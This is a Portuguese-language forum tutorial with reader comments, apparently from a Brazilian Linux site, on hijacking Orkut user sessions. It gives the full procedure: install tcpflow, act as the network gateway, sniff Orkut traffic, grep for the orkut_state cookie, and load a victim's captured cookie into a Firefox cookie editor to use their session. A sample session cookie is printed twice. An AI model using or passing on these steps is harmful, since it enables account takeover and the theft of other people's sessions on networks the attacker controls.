Estamos seguros no orkut?
Sou muito curioso na área de segurança e acabei descobrindo algo interessante. Muitos membros aqui já brincaram um pouco de hacker, pois bem, estou postando um tutorial que explora uma falha do Orkut. Espero que o Orkut resolva mais este bug...
Instalando o tcpflow (Sniffer)
Primeiramente iremos instalar um analisador de tráfego, o famoso
tcpflow . Para quem nunca utilizou, peço que dê uma olhadinha no site:
Instale ou baixe o pacote já pronto.
CentOS:
# yum install tcpflow
Debian:
# apt-get install tcpflow
Slackware:
# wget http://linuxpackages.inode.at/Slackware-12.0/Console/tcpflow/tcpflow-0.21-i486-1kan.tgz
# installpkg tcpflow-0.21-i486-1kan.tgz
:D
Sniffando rede Orkut
Bem, primeiramente precisamos ser o gateway da rede para analisarmos o tráfego pelo tcpflow. Segue o comando:
# tcpflow -i eth1 host www.orkut.com.br
No parâmetro acima pegamos todo o tráfego do domínio orkut.com.br. Deixe rodando por 3 minutos e finalize.
Digite:
# cat * | grep orkut_state
Ira aparecer uma lista enorme com vários caractere... Procure pelo cookie chamado orkut_state.
ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0:
USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1:
TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws-
cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO
YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg:
PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0:
GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:;
S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:
O início tem que ser ORKUTPREF e o final S=sR9V6nHRSjxLiNw0:.
Este cookie contém todas as informações necessárias para capturar a sessão do usuário. Vou ensinar como pegar este arquivo e capturar a sessão.
:D
Utilizando o cookie
Primeiro você deve ter o Mozilla Firefox:
E o editor de cookies do Firefox:
Agora você vai em ferramentas/Cookie Editor e adicione o seguinte cookie:
Name: orkut_state
Content: Cole o cookie da vitima "ORKUTPREF=ID=", ex.:
ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0:
USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1:
TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws-
cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO
YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg:
PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0:
GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:;
S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:
Domain: www.orkut.com.br
Path: /
Never Expires
Abra o site:
E pronto... está utilizando a sessão do cara.
Interessante, mas tomem cuidado.
valmeida@idea-planejamento.com
Outras dicas deste autor
Explorando vulnerabilidades em websites
Controle de banda com Shaper
Dúvidas para compilar um kernel?
Exploit dá acesso root em máquina local - kernels 2.6.17 e 2.6.24.1
Reduzindo o tempo de carregamento de seu site
Leitura recomendada
Cotação do Dólar no Linux em modo texto
Backports no Debian e atualizando kernel
Características gerais do Zenwalk
PACMAN do Arch Linux
Não tem como errar: Instalando e configurando o Apache
Comentários
Desculpe a pergunta ingénua, mas só funciona na rede local?
Mensagem
Desculpe a pergunta ingénua, mas só funciona na rede local?
muito boa sua dica, o problema são as pessoas irresponsáveis (pseudo-hackerzinhos) ou mal intencionadas que possam fazer uso de algo tão bem descrito.
uma faca de 2 gumes: difundir conhecimento e ao mesmo tempo dar a arma pro bandido.
veja bem, não é crítica ao seu trabalho, apenas uma reflexão do tempo em que vivemos.
Mensagem
muito boa sua dica, o problema são as pessoas irresponsáveis (pseudo-hackerzinhos) ou mal intencionadas que possam fazer uso de algo tão bem descrito.
uma faca de 2 gumes: difundir conhecimento e ao mesmo tempo dar a arma pro bandido.
veja bem, não é crítica ao seu trabalho, apenas uma reflexão do tempo em que vivemos.
Desculpe a pergunta ingénua, mas só funciona na rede local? [2]
Mensagem
Desculpe a pergunta ingénua, mas só funciona na rede local? [2]
Funciona como gateway da rede. Imagina isso em um provedor de acesso?
Mensagem
Funciona como gateway da rede. Imagina isso em um provedor de acesso?
Mensagem
Fonte pode ser baixado
http://fossies.org/unix/privat/tcpflow-0.21.tar.gz
./configure
make
make install
:)
Contribuir com comentário
Enviar